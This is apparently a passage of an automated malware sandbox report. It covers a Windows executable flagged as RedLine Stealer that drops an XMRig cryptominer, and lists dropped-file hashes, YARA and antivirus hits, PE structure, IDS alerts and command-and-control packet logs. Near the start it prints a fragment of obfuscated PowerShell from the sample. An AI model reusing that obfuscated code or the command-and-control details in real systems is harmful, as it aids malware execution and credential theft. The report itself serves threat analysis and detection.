Preview:	.....#.W..J....?e..F.......<... .....s.................................p.o.w.e.r.s.h.e.l.l...-."...(.\.".{.1.}.{.0.}.\.". .-.f. .'.e.T.'.,.'.S.'.). . .(.\.".6.T.\.".+.\.".o.\.".). . .(.[.t.Y.p.E.].(.\.".{.2.}.{.0.}.{.4.}.{.1.}.{.3.}.\.". .-.F.'.e.'.,.'.m.B.L.'.,.'.r.e.f.l.'.,.'.y.'.,.'.c.t.i.O.n...A.s.S.e.'.). . .). . .;. .$.D.l.r.4.S. .=. . .[.t.y.P.e.].(.\.".{.3.}.{.1.}.{.2.}.{.4.}.{.0.}.\.".-.F.'.R.y.'.,.'.o.S.O.f.T...W.'.,.'.i.N.3.2...R.'.,.'.M.I.C.R.'.,.'.e.G.i.S.T.'.). . .;. . .$.6.T.O.:.:.(.\.".{.0.}.{.1.}.\.". .-.f. .'.L.'.,.'.o.a.d.'.)...I.n.v.o.k.e.(. . .(...(.\.".{.1.}.{.2.}.{.0.}.\.". .-.f. .'.t.-.I.t.e.m.'.,.'.g.'.,.'.e.'.). .(.\.".v.A.R.I.\.".+.\.".A.b.\.".+.\.".l.E.\.".+.\.".:.D.l.R.4.S.\.".). . .)...\.".V.A.`.l.u.E.\.".:.:.\.".l.O.c.`.A.L.M.`.A.C.h.i.n.e.\."...(.\.".{.2.}.{.1.}.{.0.}.\.". .-.f. .'.e.y.'.,.'.u.b.k.'.,.'.O.p.e.n.S.'.)...I.n.v.o.k.e.(.(.\.".{.1.}.{.0.}.\.".-.f.'.E.'.,.'.S.O.F.T.W.A.R.'.).)...(.\.".{.1.}.{.0.}.{.2.}.\.". .-.f.'.u.'.,.'.G.e.t.V.a.l.'.,.'.e.

C:\Windows\Temp\5528.tmp

Download File

Process:	C:\Program Files\Google\Chrome\updater.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	266240
Entropy (8bit):	6.180268127784283
Encrypted:	false
SSDEEP:	6144:gYu4uhH3JfKybiYuU75Ya9qBf9mUM3gAS1:gn44XJfVtFqPigz1
MD5:	A14EA111C78897654635BC7CA419D121
SHA1:	C7AD76DFB4310DEA39CA378528FAFE8DA5CF5DEA
SHA-256:	59E489EFE112A0699BE7A45DA808D9A0C8C1A8D9CEA3EF5222A2F2352B202B97
SHA-512:	73F225A8D93B863A284A9A894A2E1C8080FB3FBC21CB6C367DB9F42381FD71936E147F6A09342F46E76CF6FE684F1FBDD22F7F98F7850AD7B93875303EE6CF5A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 45%
Reputation:	unknown
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d...."Cc...............$.......................@.....................................=....`... ..............................................0..x....p...........8...........................................z..(...................`4...............................text...............................`.P`.data...P!... ..."..................@.`..rdata...O...P...P...2..............@.`@.pdata...8.......:..................@.0@.xdata...0.......2..................@.0@.bss......... ........................`..idata..x....0......................@.0..CRT....x....P......................@.@..tls.........`......................@.@..rsrc........p......................@.0..reloc..............................@.0B........................................................................................................................................................................

C:\Windows\Temp\571D.tmp

Download File

Process:	C:\Program Files\Google\Chrome\updater.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1993216
Entropy (8bit):	7.937186916792026
Encrypted:	false
SSDEEP:	49152:u0UEpyWSX4N0ljShwokZfqDobqCNt3ZpPTVvzO9f+eBaTCons:u0U+WoNDw3jRXJp1SWeBV
MD5:	38E5FB5F909FBC75E4AD9018AE60E233
SHA1:	B609CF1ACD30CFA3D3174AA5E8EB54A1C9C8F044
SHA-256:	B753EEDD64D3A9CF880809C97A60C0A625F5F05B1D3735460F9C3CF73649F54A
SHA-512:	EC7ADC4A39ECA38554620AE0B0CB4E2B4D6DD3ECC4E66697E1391062107402A57CAE1A7127C98D9566ABB2CF0C8B9C1AFB273AABF5C27694F952E401E9D8EEAE
Malicious:	true
Yara Hits:	Rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20, Description: Detects XMRIG crypto coin miners, Source: C:\Windows\Temp\571D.tmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\Temp\571D.tmp, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 65%
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......N...................................X.....X.....X..h..l........................Y.....................~.........Rich...........PE..d...&..c.........."......`........`..%....`....@.............................@............`..................................................4..H....0........{.t............7..$............................(..(....)..8...........................................UPX0......`.............................UPX1.....`....`..\..................@....rsrc........0.......`..............@......................................................................................................................................................................................................................................................................................................................3.96.UPX!.$..

C:\Windows\Temp\__PSScriptPolicyTest_2lby5pxz.fpr.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Windows\Temp\__PSScriptPolicyTest_kk5ue5mj.i5b.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Windows\Temp\__PSScriptPolicyTest_v3qooxmw.psn.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Windows\Temp\__PSScriptPolicyTest_yfxtwilb.bk3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\netsh.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	7
Entropy (8bit):	2.2359263506290326
Encrypted:	false
SSDEEP:	3:t:t
MD5:	F1CA165C0DA831C9A17D08C4DECBD114
SHA1:	D750F8260312A40968458169B496C40DACC751CA
SHA-256:	ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8
SHA-512:	052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646
Malicious:	false
Reputation:	unknown
Preview:	Ok.....

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	6.878515842496903
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	hZDPlQwZ9D.exe
File size:	219648
MD5:	184cc76bbaab70f127ee9635e5a08147
SHA1:	67df4b82e570234a32726158850fd1e0f9afdb12
SHA256:	6485a029e9a15283f4834f89dfbbd87b19a77629a9a7eba0fd6639562e11208b
SHA512:	4ab214261d2b470dab15750ce57c30e0ac1713cefe65e04bcf274623c6e5828acecb6a767a459b4e81b34d7b8f3e507e06ac170e56cf39676127ff6dfdb731b6
SSDEEP:	3072:re3srwWO8hqK+K4ETyV8SqQ1AdFsXs5KD0W2HAUKoOEoptRJXK5eMBtHD7bH9Xig:re8rBO8hqSa1mFsXQObo5eXLqxXiUDZ
TLSH:	FC249D1774C0B131C8AFC7B111A54B8A403FE6B263C6C64A730C6A1DB971AF997B6B74
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........6...e...e...e...e...e...e...e...e...e...e...e.<.e...eq..e...e...e...e...e...e...e...e...e...eRich...e........PE..L....5}c...

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x4068f5
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x637D35C4 [Tue Nov 22 20:49:08 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	f889c281b8c32c3abe6d39de60b78eca

Entrypoint Preview

Instruction
call 00007F1948D05BD7h
jmp 00007F1948D038C9h
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov esi, ecx
mov byte ptr [esi+0Ch], 00000000h
test eax, eax
jne 00007F1948D03A85h
call 00007F1948D056BFh
mov dword ptr [esi+08h], eax
mov ecx, dword ptr [eax+6Ch]
mov dword ptr [esi], ecx
mov ecx, dword ptr [eax+68h]
mov dword ptr [esi+04h], ecx
mov ecx, dword ptr [esi]
cmp ecx, dword ptr [004358F8h]
je 00007F1948D03A34h
mov ecx, dword ptr [00435814h]
test dword ptr [eax+70h], ecx
jne 00007F1948D03A29h
call 00007F1948D065F5h
mov dword ptr [esi], eax
mov eax, dword ptr [esi+04h]
cmp eax, dword ptr [00435718h]
je 00007F1948D03A38h
mov eax, dword ptr [esi+08h]
mov ecx, dword ptr [00435814h]
test dword ptr [eax+70h], ecx
jne 00007F1948D03A2Ah
call 00007F1948D05E69h
mov dword ptr [esi+04h], eax
mov eax, dword ptr [esi+08h]
test byte ptr [eax+70h], 00000002h
jne 00007F1948D03A36h
or dword ptr [eax+70h], 02h
mov byte ptr [esi+0Ch], 00000001h
jmp 00007F1948D03A2Ch
mov ecx, dword ptr [eax]
mov dword ptr [esi], ecx
mov eax, dword ptr [eax+04h]
mov dword ptr [esi+04h], eax
mov eax, esi
pop esi
pop ebp
retn 0004h
mov edi, edi
push ebp
mov ebp, esp
sub esp, 10h
push esi
push dword ptr [ebp+0Ch]
lea ecx, dword ptr [ebp-10h]
call 00007F1948D0398Ah
mov esi, dword ptr [ebp+08h]
movsx eax, byte ptr [esi]
push eax
call 00007F1948D068F5h
cmp eax, 65h
jmp 00007F1948D03A2Eh
inc esi
movzx eax, byte ptr [esi]
push eax
call 00007F1948D067A3h
test eax, eax
pop ecx
jne 00007F1948D03A13h
movsx eax, byte ptr [esi]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2008 SP1 build 30729
[IMP] VS2005 build 50727
[C++] VS2008 SP1 build 30729
[RES] VS2008 build 21022
[LNK] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x12454	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x37000	0x610	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x10000	0x174	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xed55	0xee00	False	0.5152639180672269	data	6.643773914452299	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x10000	0x2cdc	0x2e00	False	0.5470448369565217	data	6.365163302796288	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x13000	0x23d58	0x23200	False	0.5291439612989324	data	6.433249453931304	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x37000	0x610	0x800	False	0.35302734375	data	3.231236397464153	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x37200	0x40c	data	English	United States
RT_MANIFEST	0x370a0	0x15a	ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	AddAtomW, GetCurrentProcessId, AssignProcessToJobObject, HeapSize, GetLocaleInfoA, DeleteAtom, ReleaseSemaphore, CreateEventW, FreeConsole, PulseEvent, GetModuleHandleA, GetProcAddress, Sleep, GetCommandLineA, SetUnhandledExceptionFilter, GetModuleHandleW, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetLastError, GetEnvironmentStringsW, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, LeaveCriticalSection, EnterCriticalSection, LoadLibraryA, InitializeCriticalSectionAndSpinCount, HeapAlloc, VirtualAlloc, HeapReAlloc, RtlUnwind, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW
ADVAPI32.dll	GetUserNameA, RegOpenKeyExA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, RegQueryValueExA, RegDeleteKeyA, RegSetValueA, RegCreateKeyA, RegCloseKey
SHELL32.dll
VERSION.dll	VerQueryValueW, GetFileVersionInfoW, VerFindFileW, VerInstallFileW, GetFileVersionInfoSizeW
COMCTL32.dll	ImageList_Create, ImageList_Destroy, InitCommonControlsEx, ImageList_ReplaceIcon, ImageList_Remove, CreateToolbarEx, ImageList_SetBkColor

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.5172.66.43.60497154432039616 11/26/22-11:18:10.681121	TCP	2039616	ET TROJAN Win32/Agent.AETZ CnC Checkin	49715	443	192.168.2.5	172.66.43.60
192.168.2.545.10.55.12449706470292850286 11/26/22-11:17:39.162263	TCP	2850286	ETPRO TROJAN Redline Stealer TCP CnC Activity	49706	47029	192.168.2.5	45.10.55.124
45.10.55.124192.168.2.547029497062850353 11/26/22-11:17:20.924446	TCP	2850353	ETPRO MALWARE Redline Stealer TCP CnC - Id1Response	47029	49706	45.10.55.124	192.168.2.5
192.168.2.545.10.55.12449706470292850027 11/26/22-11:17:16.653088	TCP	2850027	ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init	49706	47029	192.168.2.5	45.10.55.124

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 26, 2022 11:17:16.302649975 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:16.358378887 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:16.358495951 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:16.653088093 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:16.709518909 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:16.761871099 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:20.865817070 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:20.924446106 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:20.980973005 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:27.676224947 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:27.740850925 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:27.740935087 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:27.740998983 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:27.741167068 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:27.794122934 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:29.314428091 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:29.373596907 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:29.403853893 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:29.460500002 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:29.512940884 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:29.587444067 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:29.644246101 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:29.684829950 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:29.751061916 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:29.807579041 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:29.808793068 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:29.856739044 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:34.036437988 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:34.094014883 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:34.138354063 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:34.284436941 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:34.341598988 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:34.388365984 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:34.417844057 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:34.475023031 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:34.529014111 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:34.927412033 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:34.984338045 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:35.006779909 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:35.063896894 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:35.107187986 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:35.145312071 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:35.202116013 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:35.206465006 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:35.277138948 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:35.278839111 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:35.336477995 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:35.369972944 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:35.426753998 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:35.441591978 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:35.498260975 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:35.544689894 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:35.647397041 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:35.703169107 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:35.703448057 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:35.704845905 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:35.747865915 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:36.639575958 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:36.695718050 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.695774078 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.695805073 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.695862055 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:36.695943117 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.695987940 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:36.695987940 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:36.696042061 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:36.751910925 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.751971960 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.752002954 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.752017975 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:36.752159119 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:36.752217054 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:36.752268076 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.752300024 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.752342939 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:36.752377033 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.752451897 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:36.752511024 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.752636909 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.752929926 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:36.807742119 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.807796955 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.807827950 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.807871103 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:36.807976961 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:36.808001995 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.808007002 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:36.808100939 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:36.808371067 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.808430910 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:36.808453083 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.808753014 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.808880091 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.809139967 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.809217930 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.809433937 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.809662104 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.809708118 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.809937954 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.810029030 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:36.810146093 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:36.810266972 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.810446024 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.810724020 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.810925007 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.810956001 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.858488083 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.858552933 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.863517046 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.863661051 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.863750935 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.864226103 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.864837885 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.865326881 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.865364075 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.865593910 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.865751028 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.865782976 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:36.865921974 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.866024017 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:36.866142988 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.866324902 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.866496086 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.866971016 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.867001057 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.867600918 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.867630959 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.867664099 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.867928028 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.868321896 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:36.868483067 CET	49706	47029	192.168.2.5	45.10.55.124
Nov 26, 2022 11:17:36.921586037 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.921638966 CET	47029	49706	45.10.55.124	192.168.2.5
Nov 26, 2022 11:17:36.921948910 CET	47029	49706	45.10.55.124	192.168.2.5
